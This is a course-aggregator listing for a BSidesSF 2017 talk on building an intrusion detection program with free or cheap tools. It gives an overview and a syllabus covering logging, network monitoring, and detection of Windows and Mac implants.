Class Central is learner-supported. When you buy through links on our site, we may earn an affiliate commission.

YouTube

Building an Effective Intrusion Detection Program

Security BSides San Francisco via YouTube

Overview

Explore effective intrusion detection strategies in this BSidesSF 2017 conference talk. Learn how to build a robust program using affordable or free tools, focusing on cloud applications, endpoints, and network security monitoring. Discover techniques to identify and mitigate modern breaches, which often go undetected for extended periods. Compare recent high-profile security incidents and learn timely detection methods. Gain insights into logging best practices, Network Security Monitoring (NSM), and platform-specific tools for Mac and Windows environments. Examine real-world examples of cloud logging, including Google and Dropbox logins, as well as detecting Windows Office Macro implants and PowerShell threats. Investigate Mac implants using osquery and Santa, and explore network monitoring with Bro. Enhance your organization's security posture by implementing crowd-sourced incident response techniques and leveraging the power of effective intrusion detection.

Syllabus

Intro
Assumptions
Social stuff: Be nice.
Tool talk: Logging
Re: Logging Log everything
Tool talk: NSM
3. Tool talk: Macs
3. Tool talk: Windows
Examples: Cloud logging. Google Logins.
4. Examples: Cloud logging. Dropbox logins. Example query
Dropbox logins cont.
4. Examples: Windows Office Macro Implants
Skip a few steps...
End result
4. Examples: Windows Powershell
Windows PS cont
4. Examples: Mac implants wlosquery
Mac & osquery cont: (edited for readability)
4. Examples: Mac implants w/Santa
4. Examples: Network monitoring Bro FTW
Q&A Questions? Comments?

Taught by

Security BSides San Francisco

Reviews

Start your review of Building an Effective Intrusion Detection Program

Never Stop Learning.

Get personalized course recommendations, track subjects and courses with reminders, and more.

Someone learning on their laptop while sitting on the floor.